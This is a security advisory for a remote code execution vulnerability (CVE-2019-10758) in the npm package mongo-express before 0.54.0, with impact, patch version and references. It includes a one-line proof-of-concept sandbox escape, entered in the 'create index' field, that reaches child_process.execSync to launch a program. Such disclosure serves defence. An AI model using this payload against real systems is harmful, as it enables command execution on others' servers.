Lucene search

GoogleOSV:GHSA-H47J-HC6X-H3QQ

HistoryDec 30, 2019 - 7:30 p.m.

Remote Code Execution Vulnerability in NPM mongo-express

2019-12-3019:30:31

Google

osv.dev

9.4 High

AI Score

Confidence

High

0.975 High

EPSS

Percentile

100.0%

JSON

Impact

Remote code execution on the host machine by any authenticated user.

Proof Of Concept

Launching mongo-express on a Mac, pasting the following into the “create index” field will pop open the Mac calculator:

this.constructor.constructor("return process")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator')

Patches

Users should upgrade to version 0.54.0

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

References

Snyk Security Advisory
CVE

For more information

If you have any questions or comments about this advisory:

Open an issue in example link to repo
Email us at example email address

Thanks

@JLLeitschuh for finding and reporting this vulnerability

CPENameOperatorVersion
mongo-expresslt0.54.0

CPE	Name	Operator	Version
	mongo-express	lt	0.54.0

References

github.com/mongo-express/mongo-express/commit/7d365141deadbd38fa961cd835ce68eab5731494

github.com/mongo-express/mongo-express/pull/522

github.com/mongo-express/mongo-express/security/advisories/GHSA-h47j-hc6x-h3qq

nvd.nist.gov/vuln/detail/CVE-2019-10758

snyk.io/vuln/SNYK-JS-MONGOEXPRESS-473215